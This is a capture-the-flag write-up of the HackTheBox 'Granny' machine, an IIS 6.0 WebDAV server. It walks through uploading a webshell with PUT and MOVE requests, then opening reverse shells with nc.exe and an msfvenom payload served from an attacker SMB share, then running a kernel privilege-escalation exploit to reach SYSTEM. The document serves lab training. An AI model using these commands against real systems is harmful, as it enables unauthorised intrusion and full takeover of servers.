Granny
An easy Windows box from HackTheBox, get initial acces by uploading a webshell, then get root by running a kernel exploit.
Recon
Running the regular nmap
sudo nmap -sC -sV -oA nmap/init
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Sun, 18 Sep 2022 17:29:26 GMT
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
See that pretty much all HTTP methods work, including PUT, which might let us upload a webshell
Exploitation
First, need to find an aspx webshell, I like this one
Then open up Burpsuite, and intercept a refresh request on the website
And send the request to Repeater
Then create a PUT request to upload the webshell by copying the text and sending it as content
Need to change the request to PUT, and add a file name (here it’s shell.aspx)
Then send the request, however it doesn’t upload as it’s blocked by the server, showing a 403 Forbidden error
The workaround for this is to upload a .txt file, then use a MOVE request to change it to a .aspx file
Now, uploading the webshell as a .txt file
Then can see it on the server
Then using a MOVE http request to change it to a .aspx file, by changing the method to MOVE, and adding a destination “/shell.aspx”
Now have a reverse shell!
Now use SMB to run nc.exe and get a reverse shell
First, copying nc.exe to the current directory, then run impacket’s smbserver.py to host an smb server in the working directory
smbserver.py share .
Then set up a listener on port 4444
And on the webshell type
/c \\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444
And get a shell!
┌──(kali㉿kali)-[~/Documents/htb/granny]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1032
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
Then run systeminfo to collect hotfix and information about the system, and save it to a local file on Kali
c:\windows\system32\inetsrv> systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 1 Hours, 57 Minutes, 24 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 739 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,283 MB
Page File: In Use: 187 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
From here, just run Windows Exploit Suggester New Generation on the systeminfo text file, and find there are a lot of privilege escalation possibilities
I opted to use MS015-077, I uploaded the exe to the victim, and as well as a reverse shell executable ( made with msfvenom)
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f exe > rev.exe
Set up a reverse listener
rlwrap nc -lnvp 9001
And upload the executables using the smbserver script again
smbserver.py share .
Then on the victim, go to the TEMP directory and download them
c:\windows\TEMP> copy \\10.10.14.5\share\elevator.exe elevator.exe
c:\windows\TEMP> copy \\10.10.14.5\share\rev.exe rev.exe
And run the exploit
c:\windows\TEMP> elevator.exe rev.exe
Check back on the listener
listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1037
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\Temp>whoami
nt authority\system
And have root!